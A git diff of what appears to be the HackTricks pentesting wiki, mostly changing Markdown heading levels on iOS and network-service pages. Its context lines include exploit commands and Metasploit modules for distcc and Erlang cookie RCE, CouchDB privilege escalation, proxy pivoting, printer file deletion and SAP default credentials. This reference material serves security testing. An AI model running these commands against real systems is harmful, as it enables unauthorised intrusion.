`ios hooking watch class `: Hook all the methods of a class, dump all the initial parameters and returns @@ -193,7 +195,7 @@ Now that you have **enumerated the classes and modules** used by the application ios hooking watch class iGoat_Swift.PlistStorageExerciseViewController ``` -## Hook a single method +### Hook a single method - `ios hooking watch method "-[ ]" --dump-args --dump-return --dump-backtrace`: Hook an specific method of a class dumping the parameters, backtraces and returns of the method each time it's called @@ -201,7 +203,7 @@ Now that you have **enumerated the classes and modules** used by the application ios hooking watch method "-[iGoat_Swift.BinaryCookiesExerciseVC verifyItemPressed]" --dump-args --dump-backtrace --dump-return ``` -## Change Boolean Return +### Change Boolean Return - `ios hooking set return_value "-[ ]" false`: This will make the selected method return the indicated boolean @@ -209,7 +211,7 @@ Now that you have **enumerated the classes and modules** used by the application ios hooking set return_value "-[iGoat_Swift.BinaryCookiesExerciseVC verifyItemPressed]" false ``` -## Generate hooking template +### Generate hooking template - `ios hooking generate simple `: diff --git a/src/mobile-pentesting/ios-pentesting/ios-protocol-handlers.md b/src/mobile-pentesting/ios-pentesting/ios-protocol-handlers.md index 7c6d90a93..ec81a1ed4 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-protocol-handlers.md +++ b/src/mobile-pentesting/ios-pentesting/ios-protocol-handlers.md @@ -1,8 +1,9 @@ -{{#include ../../banners/hacktricks-training.md}} - # WebView Protocol Handlers {{#include ../../banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/mobile-pentesting/ios-pentesting/ios-serialisation-and-encoding.md b/src/mobile-pentesting/ios-pentesting/ios-serialisation-and-encoding.md index f19c2ec49..482b0573a 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-serialisation-and-encoding.md +++ b/src/mobile-pentesting/ios-pentesting/ios-serialisation-and-encoding.md @@ -1,3 +1,5 @@ +# iOS Serialisation and Encoding + {{#include ../../banners/hacktricks-training.md}} Code and more information in [https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/#object-persistence](https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/#object-persistence). diff --git a/src/mobile-pentesting/ios-pentesting/ios-uipasteboard.md b/src/mobile-pentesting/ios-pentesting/ios-uipasteboard.md index 7227b86d9..df8aba3d6 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-uipasteboard.md +++ b/src/mobile-pentesting/ios-pentesting/ios-uipasteboard.md @@ -1,3 +1,5 @@ +# iOS Pasteboard + {{#include ../../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/10000-network-data-management-protocol-ndmp.md b/src/network-services-pentesting/10000-network-data-management-protocol-ndmp.md index d6d83dc0b..a2f492745 100644 --- a/src/network-services-pentesting/10000-network-data-management-protocol-ndmp.md +++ b/src/network-services-pentesting/10000-network-data-management-protocol-ndmp.md @@ -1,6 +1,8 @@ +# 10000/tcp - Network Data Management Protocol (NDMP) + {{#include ../banners/hacktricks-training.md}} -# **Protocol Information** +## **Protocol Information** From [Wikipedia](https://en.wikipedia.org/wiki/NDMP): @@ -13,7 +15,7 @@ PORT STATE SERVICE REASON VERSION 10000/tcp open ndmp syn-ack Symantec/Veritas Backup Exec ndmp ``` -# **Enumeration** +## **Enumeration** ```bash nmap -n -sV --script "ndmp-fs-info or ndmp-version" -p 10000 #Both are default scripts diff --git a/src/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md b/src/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md index 20f03d16e..f1f8fa2ef 100644 --- a/src/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md +++ b/src/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md @@ -1,6 +1,8 @@ +# 24007-24008-24009-49152 - Pentesting GlusterFS + {{#include ../banners/hacktricks-training.md}} -# Basic Information +## Basic Information **GlusterFS** is a **distributed file system** that combines storage from multiple servers into one **unified system**. It allows for **arbitrary scalability**, meaning you can easily add or remove storage servers without disrupting the overall file system. This ensures high **availability** and **fault tolerance** for your data. With GlusterFS, you can access your files as if they were stored locally, regardless of the underlying server infrastructure. It provides a powerful and flexible solution for managing large amounts of data across multiple servers. diff --git a/src/network-services-pentesting/3128-pentesting-squid.md b/src/network-services-pentesting/3128-pentesting-squid.md index d1bebeb63..76c46637c 100644 --- a/src/network-services-pentesting/3128-pentesting-squid.md +++ b/src/network-services-pentesting/3128-pentesting-squid.md @@ -1,6 +1,8 @@ +# 3128/tcp - Pentesting Squid + {{#include ../banners/hacktricks-training.md}} -# Basic Information +## Basic Information From [Wikipedia](): @@ -13,9 +15,9 @@ PORT STATE SERVICE VERSION 3128/tcp open http-proxy Squid http proxy 4.11 ``` -# Enumeration +## Enumeration -## Web Proxy +### Web Proxy You can try to set this discovered service as proxy in your browser. However, if it's configured with HTTP authentication you will be prompted for usernames and password. @@ -24,7 +26,7 @@ You can try to set this discovered service as proxy in your browser. However, if curl --proxy http://10.10.11.131:3128 http://10.10.11.131 ``` -## Nmap proxified +### Nmap proxified You can also try to abuse the proxy to **scan internal ports proxifying nmap**.\ Configure proxychains to use the squid proxy adding he following line at the end of the proxichains.conf file: `http 10.10.10.10 3128` @@ -32,7 +34,7 @@ For proxies requiring authentication, append credentials to the configuration by Then run nmap with proxychains to **scan the host from local**: `proxychains nmap -sT -n -p- localhost` -## SPOSE Scanner +### SPOSE Scanner Alternatively, the Squid Pivoting Open Port Scanner ([spose.py](https://github.com/aancw/spose)) can be used. diff --git a/src/network-services-pentesting/3299-pentesting-saprouter.md b/src/network-services-pentesting/3299-pentesting-saprouter.md index 4cafbd87b..4ec122c14 100644 --- a/src/network-services-pentesting/3299-pentesting-saprouter.md +++ b/src/network-services-pentesting/3299-pentesting-saprouter.md @@ -1,3 +1,5 @@ +# # 3299/tcp - Pentesting SAProuter + {{#include ../banners/hacktricks-training.md}} ```text diff --git a/src/network-services-pentesting/3632-pentesting-distcc.md b/src/network-services-pentesting/3632-pentesting-distcc.md index 36f188987..254b84834 100644 --- a/src/network-services-pentesting/3632-pentesting-distcc.md +++ b/src/network-services-pentesting/3632-pentesting-distcc.md @@ -1,6 +1,8 @@ +# 3632 - Pentesting Distcc + {{#include ../banners/hacktricks-training.md}} -# Basic Information +## Basic Information **Distcc** is a tool that enhances the **compilation process** by utilizing the **idle processing power** of other computers in the network. When **distcc** is set up on a machine, this machine is capable of distributing its **compilation tasks** to another system. This recipient system must be running the **distccd daemon** and must have a **compatible compiler** installed to process the sent code. @@ -11,7 +13,7 @@ PORT STATE SERVICE 3632/tcp open distccd ``` -# Exploitation +## Exploitation Check if it's vulnerable to **CVE-2004-2687** to execute arbitrary code: @@ -20,11 +22,11 @@ msf5 > use exploit/unix/misc/distcc_exec nmap -p 3632 --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'" ``` -# Shodan +## Shodan _I don't think shodan detects this service._ -# Resources +## Resources - [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec) - [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855) diff --git a/src/network-services-pentesting/3690-pentesting-subversion-svn-server.md b/src/network-services-pentesting/3690-pentesting-subversion-svn-server.md index 80b9df44c..85ced3ea7 100644 --- a/src/network-services-pentesting/3690-pentesting-subversion-svn-server.md +++ b/src/network-services-pentesting/3690-pentesting-subversion-svn-server.md @@ -1,6 +1,8 @@ +# 3690/tcp - Pentesting Subversion (SVN) Server + {{#include ../banners/hacktricks-training.md}} -# Basic Information +## Basic Information **Subversion** is a centralized **version control system** that plays a crucial role in managing both the present and historical data of projects. Being an **open source** tool, it operates under the **Apache license**. This system is widely acknowledged for its capabilities in **software versioning and revision control**, ensuring that users can keep track of changes over time efficiently. @@ -11,7 +13,7 @@ PORT STATE SERVICE 3690/tcp open svnserve Subversion ``` -## Banner Grabbing +### Banner Grabbing ``` nc -vn 10.10.10.10 3690 diff --git a/src/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md b/src/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md index ca7be3409..75eb61f2a 100644 --- a/src/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md +++ b/src/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md @@ -1,6 +1,8 @@ +# 4369 Pentesting Erlang Port Mapper Daemon (epmd) + {{#include ../banners/hacktricks-training.md}} -# Basic Info +## Basic Info The **Erlang Port Mapper Daemon (epmd)** serves as a coordinator for distributed Erlang instances. It is responsible for mapping symbolic node names to machine addresses, essentially ensuring that each node name is associated with a specific address. This role of **epmd** is crucial for the seamless interaction and communication between different Erlang nodes across a network. @@ -13,9 +15,9 @@ PORT STATE SERVICE VERSION This is used by default on RabbitMQ and CouchDB installations. -# Enumeration +## Enumeration -## Manual +### Manual ```bash echo -n -e "\x00\x01\x6e" | nc -vn 4369 @@ -27,7 +29,7 @@ erl #Once Erlang is installed this will promp an erlang terminal 1> net_adm:names(''). #This will return the listen addresses ``` -## Automatic +### Automatic ```bash nmap -sV -Pn -n -T4 -p 4369 --script epmd-info @@ -44,9 +46,9 @@ PORT STATE SERVICE VERSION |_ kazoo-rabbitmq: 25672 ``` -# Erlang Cookie RCE +## Erlang Cookie RCE -## Remote Connection +### Remote Connection If you can **leak the Authentication cookie** you will be able to execute code on the host. Usually, this cookie is located in `~/.erlang.cookie` and is generated by erlang at the first start. If not modified or set manually it is a random string \[A:Z] with a length of 20 characters. @@ -69,7 +71,7 @@ The author also share a program to brutforce the cookie: epmd_bf-0.1.tar.bz2 {{#endfile}} -## Local Connection +### Local Connection In this case we are going to abuse CouchDB to escalate privileges locally: @@ -83,14 +85,14 @@ HOME=/ erl -sname anonymous -setcookie YOURLEAKEDCOOKIE Example taken from [https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution](https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution)\ You can use **Canape HTB machine to** **practice** how to **exploit this vuln**. -## Metasploit +### Metasploit ```bash #Metasploit can also exploit this if you know the cookie msf5> use exploit/multi/misc/erlang_cookie_rce ``` -# Shodan +## Shodan - `port:4369 "at port"` diff --git a/src/network-services-pentesting/44134-pentesting-tiller-helm.md b/src/network-services-pentesting/44134-pentesting-tiller-helm.md index 5177d45f6..4e34a16a2 100644 --- a/src/network-services-pentesting/44134-pentesting-tiller-helm.md +++ b/src/network-services-pentesting/44134-pentesting-tiller-helm.md @@ -1,6 +1,8 @@ +# 44134 Tiller / Helm + {{#include ../banners/hacktricks-training.md}} -# Basic Information +## Basic Information Helm is the **package manager** for Kubernetes. It allows to package YAML files and distribute them in public and private repositories. These packages are called **Helm Charts**. **Tiller** is the **service** **running** by default in the port 44134 offering the service. @@ -11,7 +13,7 @@ PORT STATE SERVICE VERSION 44134/tcp open unknown ``` -# Enumeration +## Enumeration If you can **enumerate pods and/or services** of different namespaces enumerate them and search for the ones with **"tiller" in their name**: @@ -52,7 +54,7 @@ Then, you can **enumerate the service**: helm --host tiller-deploy.kube-system:44134 version ``` -## Privilege Escalation +### Privilege Escalation By default **Helm2** was installed in the **namespace kube-system** with **high privileges**, so if you find the service and has access to it, this could allow you to **escalate privileges**. diff --git a/src/network-services-pentesting/44818-ethernetip.md b/src/network-services-pentesting/44818-ethernetip.md index 24b044a21..325ff3d66 100644 --- a/src/network-services-pentesting/44818-ethernetip.md +++ b/src/network-services-pentesting/44818-ethernetip.md @@ -1,6 +1,8 @@ +# 44818 Pentesting EtherNet/IP + {{#include ../banners/hacktricks-training.md}} -# **Protocol Information** +## **Protocol Information** EtherNet/IP is an **industrial Ethernet networking protocol** commonly used in **industrial automation control systems**. It was developed by Rockwell Automation in the late 1990s and is managed by ODVA. The protocol ensures **multi-vendor system interoperability** and is utilized in various applications such as **water processing plants**, **manufacturing facilities**, and **utilities**. To identify an EtherNet/IP device, a query is sent to **TCP/44818** with a **list Identities Message (0x63)**. @@ -11,7 +13,7 @@ PORT STATE SERVICE 44818/tcp open EtherNet/IP ``` -# **Enumeration** +## **Enumeration** ```bash nmap -n -sV --script enip-info -p 44818 @@ -19,7 +21,7 @@ pip3 install cpppo python3 -m cpppo.server.enip.list_services [--udp] [--broadcast] --list-identity -a ``` -# Shodan +## Shodan - `port:44818 "product name"` diff --git a/src/network-services-pentesting/47808-udp-bacnet.md b/src/network-services-pentesting/47808-udp-bacnet.md index 07c70a0c0..a6518aefc 100644 --- a/src/network-services-pentesting/47808-udp-bacnet.md +++ b/src/network-services-pentesting/47808-udp-bacnet.md @@ -1,6 +1,8 @@ +# 47808/udp - BACnet + {{#include ../banners/hacktricks-training.md}} -# Protocol Information +## Protocol Information **BACnet** is a **communications protocol** for Building Automation and Control (BAC) networks that leverages the **ASHRAE**, **ANSI**, and **ISO 16484-5 standard** protocol. It facilitates communication among building automation and control systems, enabling applications such as HVAC control, lighting control, access control, and fire detection systems to exchange information. BACnet ensures interoperability and allows computerized building automation devices to communicate, regardless of the specific services they provide. @@ -11,9 +13,9 @@ PORT STATE SERVICE 47808/udp open BACNet -- Building Automation and Control NetworksEnumerate ``` -# Enumeration +## Enumeration -## Manual +### Manual ```bash pip3 install BAC0 @@ -37,7 +39,7 @@ for i, (deviceId, companyId, devIp, numDeviceId) in enumerate(bacnet.devices): # print(readDevice) #List all available info about the device ``` -## Automatic +### Automatic ```bash nmap --script bacnet-info --script-args full=yes -sU -n -sV -p 47808 @@ -45,7 +47,7 @@ nmap --script bacnet-info --script-args full=yes -sU -n -sV -p 47808 This script does not attempt to join a BACnet network as a foreign device, it simply sends BACnet requests directly to an IP addressable device. -## Shodan +### Shodan - `port:47808 instance` - `"Instance ID" "Vendor Name"` diff --git a/src/network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md b/src/network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md index 7439e81be..d0e58be0a 100644 --- a/src/network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md +++ b/src/network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md @@ -1,6 +1,8 @@ +# 50030-50060-50070-50075-50090 - Pentesting Hadoop + {{#include ../banners/hacktricks-training.md}} -# **Basic Information** +## **Basic Information** **Apache Hadoop** is an **open-source framework** for **distributed storage and processing** of **large datasets** across **computer clusters**. It uses **HDFS** for storage and **MapReduce** for processing. diff --git a/src/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md b/src/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md index 1e93a5890..6e72240df 100644 --- a/src/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md +++ b/src/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md @@ -1,10 +1,12 @@ +# 515 Pentesting Line Printer Daemon (LPD) + {{#include ../banners/hacktricks-training.md}} -### **Introduction to LPD Protocol** +## **Introduction to LPD Protocol** In the 1980s, the **Line Printer Daemon (LPD) protocol** was developed in Berkeley Unix, which later became formalized through RFC1179. This protocol operates over port 515/tcp, allowing interactions through the `lpr` command. The essence of printing via LPD involves sending a **control file** (to specify job details and user) along with a **data file** (which holds the print information). While the control file allows the selection of **various file formats** for the data file, the handling of these files is determined by the specific LPD implementation. A widely recognized implementation for Unix-like systems is **LPRng**. Notably, the LPD protocol can be exploited to execute **malicious PostScript** or **PJL print jobs**. -### **Tools for Interacting with LPD Printers** +## **Tools for Interacting with LPD Printers** [**PRET**](https://github.com/RUB-NDS/PRET) introduces two essential tools, `lpdprint` and `lpdtest`, offering a straightforward method to interact with LPD-compatible printers. These tools enable a range of actions from printing data to manipulating files on the printer, such as downloading, uploading, or deleting: @@ -25,7 +27,7 @@ lpdtest.py hostname mail lpdtest@mailhost.local For individuals interested in further exploring the realm of **printer hacking**, a comprehensive resource can be found here: [**Hacking Printers**](http://hacking-printers.net/wiki/index.php/Main_Page). -# Shodan +## Shodan - `port 515` diff --git a/src/network-services-pentesting/5601-pentesting-kibana.md b/src/network-services-pentesting/5601-pentesting-kibana.md index 8ef011e3f..b59365414 100644 --- a/src/network-services-pentesting/5601-pentesting-kibana.md +++ b/src/network-services-pentesting/5601-pentesting-kibana.md @@ -1,14 +1,16 @@ +# 5601/tcp - Pentesting Kibana + {{#include ../banners/hacktricks-training.md}} -# Basic Information +## Basic Information Kibana is known for its ability to search and visualize data within Elasticsearch, typically running on port **5601**. It serves as the interface for the Elastic Stack cluster's monitoring, management, and security functions. -## Understanding Authentication +### Understanding Authentication The process of authentication in Kibana is inherently linked to the **credentials used in Elasticsearch**. If Elasticsearch has authentication disabled, Kibana can be accessed without any credentials. Conversely, if Elasticsearch is secured with credentials, the same credentials are required to access Kibana, maintaining identical user permissions across both platforms. Credentials might be found in the **/etc/kibana/kibana.yml** file. If these credentials do not pertain to the **kibana_system** user, they may offer broader access rights, as the kibana_system user's access is restricted to monitoring APIs and the .kibana index. -## Actions Upon Access +### Actions Upon Access Once access to Kibana is secured, several actions are advisable: @@ -16,7 +18,7 @@ Once access to Kibana is secured, several actions are advisable: - The ability to manage users, including the editing, deletion, or creation of new users, roles, or API keys, is found under Stack Management -> Users/Roles/API Keys. - It's important to check the installed version of Kibana for known vulnerabilities, such as the RCE vulnerability identified in versions prior to 6.6.0 ([More Info](https://insinuator.net/2021/01/pentesting-the-elk-stack/index.html#ref2)). -## SSL/TLS Considerations +### SSL/TLS Considerations In instances where SSL/TLS is not enabled, the potential for leaking sensitive information should be thoroughly evaluated.s diff --git a/src/network-services-pentesting/69-udp-tftp.md b/src/network-services-pentesting/69-udp-tftp.md index 2b97a8897..6daf35d85 100644 --- a/src/network-services-pentesting/69-udp-tftp.md +++ b/src/network-services-pentesting/69-udp-tftp.md @@ -1,7 +1,8 @@ +# 69 - UDP TFTP + {{#include ../banners/hacktricks-training.md}} - -# Basic Information +## Basic Information **Trivial File Transfer Protocol (TFTP)** is a straightforward protocol used on **UDP port 69** that allows file transfers without needing authentication. Highlighted in **RFC 1350**, its simplicity means it lacks key security features, leading to limited use on the public Internet. However, **TFTP** is extensively utilized within large internal networks for distributing **configuration files** and **ROM images** to devices such as **VoIP handsets**, thanks to its efficiency in these specific scenarios. @@ -14,7 +15,7 @@ PORT STATE SERVICE REASON 69/udp open tftp script-set ``` -# Enumeration +## Enumeration TFTP doesn't provide directory listing so the script `tftp-enum` from `nmap` will try to brute-force default paths. @@ -22,7 +23,7 @@ TFTP doesn't provide directory listing so the script `tftp-enum` from `nmap` wil nmap -n -Pn -sU -p69 -sV --script tftp-enum ``` -## Download/Upload +### Download/Upload You can use Metasploit or Python to check if you can download/upload files: @@ -37,7 +38,7 @@ client.download("filename in server", "/tmp/filename", timeout=5) client.upload("filename to upload", "/local/path/file", timeout=5) ``` -## Shodan +### Shodan - `port:69` diff --git a/src/network-services-pentesting/7-tcp-udp-pentesting-echo.md b/src/network-services-pentesting/7-tcp-udp-pentesting-echo.md index a652d2f86..954c762d4 100644 --- a/src/network-services-pentesting/7-tcp-udp-pentesting-echo.md +++ b/src/network-services-pentesting/7-tcp-udp-pentesting-echo.md @@ -1,6 +1,8 @@ +# 7/tcp/udp - Pentesting Echo Service + {{#include ../banners/hacktricks-training.md}} -# Basic Information +## Basic Information An echo service is running on this host. The echo service was intended for testing and measurement purposes and may listen on both TCP and UDP protocols. The server sends back any data it receives, with no modification.\ **It's possible to cause a denial of service by connecting the a echo service to the echo service on the same or another machine**. Because of the excessively high number of packets produced, the affected machines may be effectively taken out of service.\ diff --git a/src/network-services-pentesting/9000-pentesting-fastcgi.md b/src/network-services-pentesting/9000-pentesting-fastcgi.md index 64ddebc5f..0018e3a7e 100644 --- a/src/network-services-pentesting/9000-pentesting-fastcgi.md +++ b/src/network-services-pentesting/9000-pentesting-fastcgi.md @@ -1,6 +1,8 @@ +# 9000 Pentesting FastCGI + {{#include ../banners/hacktricks-training.md}} -# Basic Information +## Basic Information If you want to **learn what is FastCGI** check the following page: @@ -10,7 +12,7 @@ pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedi By default **FastCGI** run in **port** **9000** and isn't recognized by nmap. **Usually** FastCGI only listen in **localhost**. -# RCE +## RCE It's quite easy to make FastCGI execute arbitrary code: diff --git a/src/network-services-pentesting/9001-pentesting-hsqldb.md b/src/network-services-pentesting/9001-pentesting-hsqldb.md index d80671618..37b2962d5 100644 --- a/src/network-services-pentesting/9001-pentesting-hsqldb.md +++ b/src/network-services-pentesting/9001-pentesting-hsqldb.md @@ -1,6 +1,8 @@ -{{#include ../banners/hacktricks-training.md}} +# 9001 - Pentesting HSQLDB -# Basic Information +## Basic Information + +{{#include ../banners/hacktricks-training.md}} **HSQLDB \([HyperSQL DataBase](http://hsqldb.org/)\)** is the leading SQL relational database system written in Java. It offers a small, fast multithreaded and transactional database engine with in-memory and disk-based tables and supports embedded and server modes. @@ -10,9 +12,7 @@ 9001/tcp open jdbc HSQLDB JDBC (Network Compatibility Version 2.3.4.0) ``` -# Information - -### Default Settings +## Default Settings Note that by default this service is likely running in memory or is bound to localhost. If you found it, you probably exploited another service and are looking to escalate privileges. @@ -26,15 +26,15 @@ grep -rP 'jdbc:hsqldb.*password.*' /path/to/search Note the database name carefully - you’ll need it to connect. -# Info Gathering +## Info Gathering Connect to the DB instance by [downloading HSQLDB](https://sourceforge.net/projects/hsqldb/files/) and extracting `hsqldb/lib/hsqldb.jar`. Run the GUI app \(eww\) using `java -jar hsqldb.jar` and connect to the instance using the discovered/weak credentials. Note the connection URL will look something like this for a remote system: `jdbc:hsqldb:hsql://ip/DBNAME`. -# Tricks +## Tricks -## Java Language Routines +### Java Language Routines We can call static methods of a Java class from HSQLDB using Java Language Routines. Do note that the called class needs to be in the application’s classpath. @@ -42,7 +42,7 @@ JRTs can be `functions` or `procedures`. Functions can be called via SQL stateme If the Java method we want to call returns void, we need to use a procedure invoked with the `CALL` statement. -## Reading Java System Properties +### Reading Java System Properties Create function: @@ -60,7 +60,7 @@ VALUES(getsystemproperty('user.name')) You can find a [list of system properties here](https://docs.oracle.com/javase/tutorial/essential/environment/sysprop.html). -## Write Content to File +### Write Content to File You can use the `com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename` Java gadget located in the JDK \(auto loaded into the class path of the application\) to write hex-encoded items to disk via a custom procedure. **Note the maximum size of 1024 bytes**. diff --git a/src/network-services-pentesting/9100-pjl.md b/src/network-services-pentesting/9100-pjl.md index d81184531..e060528da 100644 --- a/src/network-services-pentesting/9100-pjl.md +++ b/src/network-services-pentesting/9100-pjl.md @@ -1,6 +1,8 @@ +# 9100/tcp - PJL (Printer Job Language) + {{#include ../banners/hacktricks-training.md}} -# Basic Information +## Basic Information From [here](http://hacking-printers.net/wiki/index.php/Port_9100_printing): Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer. It is the default method used by CUPS and the Windows printing architecture to communicate with network printers as it is considered as ‘_the simplest, fastest, and generally the most reliable network protocol used for printers_’. Raw port 9100 printing, also referred to as JetDirect, AppSocket or PDL-datastream actually **is not a printing protocol by itself**. Instead **all data sent is directly processed by the printing device**, just like a parallel connection over TCP. In contrast to LPD, IPP and SMB, this can send direct feedback to the client, including status and error messages. Such a **bidirectional channel** gives us direct **access** to **results** of **PJL**, **PostScript** or **PCL** commands. Therefore raw port 9100 printing – which is supported by almost any network printer – is used as the channel for security analysis with PRET and PFT. @@ -12,9 +14,9 @@ If you want to learn more about [**hacking printers read this page**](http://hac 9100/tcp open jetdirect ``` -# Enumeration +## Enumeration -## Manual +### Manual ```bash nc -vn 9100 @@ -33,7 +35,7 @@ nc -vn 9100 @PJL FSDELETE #Useful to delete a file ``` -## Automatic +### Automatic ```bash nmap -sV --script pjl-ready-message -p @@ -58,7 +60,7 @@ This is the tool you want to use to abuse printers: https://github.com/RUB-NDS/PRET {{#endref}} -# **Shodan** +## **Shodan** - `pjl port:9100` diff --git a/src/network-services-pentesting/pentesting-264-check-point-firewall-1.md b/src/network-services-pentesting/pentesting-264-check-point-firewall-1.md index bb4312b95..470ad8ba0 100644 --- a/src/network-services-pentesting/pentesting-264-check-point-firewall-1.md +++ b/src/network-services-pentesting/pentesting-264-check-point-firewall-1.md @@ -1,8 +1,10 @@ +# # 264/tcp - Pentesting Check Point Firewall + {{#include ../banners/hacktricks-training.md}} It's possible to interact with **CheckPoint** **Firewall-1** firewalls to discover valuable information such as the firewall's name and the management station's name. This can be done by sending a query to the port **264/TCP**. -### Obtaining Firewall and Management Station Names +## Obtaining Firewall and Management Station Names Using a pre-authentication request, you can execute a module that targets the **CheckPoint Firewall-1**. The necessary commands for this operation are outlined below: @@ -21,7 +23,7 @@ Upon execution, the module attempts to contact the firewall's SecuRemote Topolog [*] Auxiliary module execution completed ``` -### Alternative Method for Hostname and ICA Name Discovery +## Alternative Method for Hostname and ICA Name Discovery Another technique involves a direct command that sends a specific query to the firewall and parses the response to extract the firewall's hostname and ICA name. The command and its structure are as follows: diff --git a/src/network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.md b/src/network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.md index fcd2c7907..29f3cd733 100644 --- a/src/network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.md +++ b/src/network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.md @@ -1,6 +1,6 @@ -{{#include ../banners/hacktricks-training.md}} +# Internet Printing Protocol -# Internet Printing Protocol \(IPP\) +{{#include ../banners/hacktricks-training.md}} The **Internet Printing Protocol (IPP)**, as specified in **RFC2910** and **RFC2911**, serves as a foundation for printing over the internet. Its capability to be extended is showcased by developments like **IPP Everywhere**, which aims to standardize mobile and cloud printing, and the introduction of extensions for **3D printing**. diff --git a/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md b/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md index 924502f45..1a4769092 100644 --- a/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md +++ b/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md @@ -1,14 +1,16 @@ +# # 2301/tcp - Pentesting Compaq/HP Insight Manager + {{#include ../banners/hacktricks-training.md}} **Default Port:** 2301,2381 -# **Default passwords** +## Default passwords {{#ref}} http://www.vulnerabilityassessment.co.uk/passwordsC.htm {{#endref}} -# Config files +## Config files ```text path.properties diff --git a/src/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md b/src/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md index 3c7f7189d..3781e551d 100644 --- a/src/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md +++ b/src/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md @@ -1,7 +1,9 @@ +# FTP Bounce Download 2 of FTP File + {{#include ../../banners/hacktricks-training.md}} -# Resume +## Resume If you have access to a bounce FTP server, you can make it request files of other FTP server \(where you know some credentials\) and download that file to your own server. diff --git a/src/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md b/src/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md index 713d58137..7d8026302 100644 --- a/src/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md +++ b/src/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md @@ -1,3 +1,5 @@ +# Harvesting Tickets from Linux + {{#include ../../banners/hacktricks-training.md}} ### Credential Storage in Linux diff --git a/src/network-services-pentesting/pentesting-modbus.md b/src/network-services-pentesting/pentesting-modbus.md index 5beadffb1..b598d269b 100644 --- a/src/network-services-pentesting/pentesting-modbus.md +++ b/src/network-services-pentesting/pentesting-modbus.md @@ -1,7 +1,9 @@ +# # 502/tcp - Pentesting Modbus Protocol + {{#include ../banners/hacktricks-training.md}} -# Basic Information +## Basic Information In 1979, the **Modbus Protocol** was developed by Modicon, serving as a messaging structure. Its primary use involves facilitating communication between intelligent devices, operating under a master-slave/client-server model. This protocol plays a crucial role in enabling devices to exchange data efficiently. @@ -12,7 +14,7 @@ PORT STATE SERVICE 502/tcp open modbus ``` -# Enumeration +## Enumeration ```bash nmap --script modbus-discover -p 502 diff --git a/src/network-services-pentesting/pentesting-sap.md b/src/network-services-pentesting/pentesting-sap.md index 84f4d943f..3d33b1131 100644 --- a/src/network-services-pentesting/pentesting-sap.md +++ b/src/network-services-pentesting/pentesting-sap.md @@ -1,7 +1,9 @@ +# Pentesting SAP + {{#include ../banners/hacktricks-training.md}} -# Introduction about SAP +## Introduction about SAP SAP stands for Systems Applications and Products in Data Processing. SAP, by definition, is also the name of the ERP \(Enterprise Resource Planning\) software as well as the name of the company. SAP system consists of a number of fully integrated modules, which covers virtually every aspect of business management. @@ -16,7 +18,7 @@ You’d be surprised if you knew how often these **passwords aren’t changed in Try to get access to the shell of any server using username <SID>adm. Bruteforcing can help, whoever there can be Account Lockout mechanism. -# Discovery +## Discovery > Next section is mostly from [https://github.com/shipcod3/mySapAdventures](https://github.com/shipcod3/mySapAdventures) from user shipcod3! @@ -64,7 +66,7 @@ msf auxiliary(sap_service_discovery) > run [*] 192.168.96.101: - [SAP] Beginning service Discovery '192.168.96.101' ``` -## Testing the Thick Client / SAP GUI +### Testing the Thick Client / SAP GUI Here is the command to connect to SAP GUI `sapgui ` @@ -133,7 +135,7 @@ BWDEVELOPER:Down1oad:001 - Check if you can execute system commands / run scripts in the client. - Check if you can do XSS on BAPI Explorer -# Testing the web interface +## Testing the web interface - Crawl the URLs \(see discovery phase\). - Fuzz the URLs like in the discovery phase. Here is what [http://SAP:50000/index.html](http://sap:50000/index.html) looks like: @@ -182,13 +184,13 @@ BWDEVELOPER:Down1oad:001 ``` -# Configuration Parameters +## Configuration Parameters If you have correct login details during the pentest or you have managed to 